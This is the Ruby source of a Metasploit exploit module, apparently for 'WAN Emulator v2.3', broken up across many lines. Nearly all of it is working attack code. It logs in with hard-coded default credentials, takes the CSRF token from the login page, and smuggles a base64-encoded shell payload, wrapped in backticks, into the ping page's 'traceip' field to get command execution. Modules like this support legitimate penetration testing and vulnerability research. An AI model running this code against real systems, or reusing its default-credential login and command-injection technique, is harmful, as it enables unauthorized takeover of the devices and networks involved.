##
# This module requires Metasploit: http//metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##
require
'msf/core'
class
Metasploit3 < Msf::Exploit::Remote
Rank = ExcellentRanking
include Msf::Exploit::Remote::HttpClient
def
initialize(info = {})
super
(update_info(info,
'Name'
=>
'WAN Emulator v2.3 Command Execution'
,
'Description'
=> %q{
},
'License'
=>
MSF_LICENSE
,
'Privileged'
=>
true
,
'Platform'
=>
'unix'
,
'Arch'
=>
ARCH_CMD
,
'Author'
=>
[
'Brendan Coles <bcoles[at]gmail.com>'
,
# Discovery and exploit
],
'References'
=>
[
],
'Payload'
=>
{
'Space'
=>
1024
,
'BadChars'
=>
""
,
'DisableNops'
=>
true
,
#'Compat' =>
# {
# 'PayloadType' => 'cmd',
# 'RequiredCmd' => 'generic netcat netcat-e',
# }
},
'DefaultOptions'
=>
{
'ExitFunction'
=>
'none'
},
'Targets'
=>
[
[
'Automatic Targeting'
, {
'auto'
=>
true
}]
],
'DefaultTarget'
=>
0
,
'DisclosureDate'
=>
'Aug 12 2012'
))
end
def
exploit
res = send_request_cgi({
'uri'
=> normalize_uri(target_uri.path,
'accounts'
,
'login/'
),
})
cookie = res.headers[
'Set-Cookie'
]
csrf =
$1
if
res.body =~ / name=
'csrfmiddlewaretoken'
value=
'(.*)'
\/><\/div>/
post = {
'csrfmiddlewaretoken'
=> csrf,
'username'
=>
'd42admin'
,
'password'
=>
'default'
,
'next'
=>
'/'
}
res = send_request_cgi({
'uri'
=> normalize_uri(target_uri.path,
'accounts'
,
'login/'
),
'vars_post'
=> post,
'method'
=>
'POST'
,
'cookie'
=> cookie
})
unless
res.code ==
302
fail_with(
"auth failed"
)
end
cookie = res.headers[
'Set-Cookie'
]
res = send_request_cgi({
'uri'
=> normalize_uri(target_uri.path,
'ping/'
),
'cookie'
=> cookie
})
cookie = res.headers[
'Set-Cookie'
]
csrf =
$1
if
res.body =~ / name=
'csrfmiddlewaretoken'
value=
'(.*)'
\/><\/div>/
post = {
'csrfmiddlewaretoken'
=> csrf,
'traceip'
=>
"www.google.com`echo #{Rex::Text.encode_base64(payload.encoded)}|base64 --decode|sh`"
,
'trace'
=>
''
}
res = send_request_cgi({
'uri'
=> normalize_uri(target_uri.path,
'ping/'
),
'method'
=>
"POST"
,
'vars_post'
=> post,
'cookie'
=> cookie
})
end
end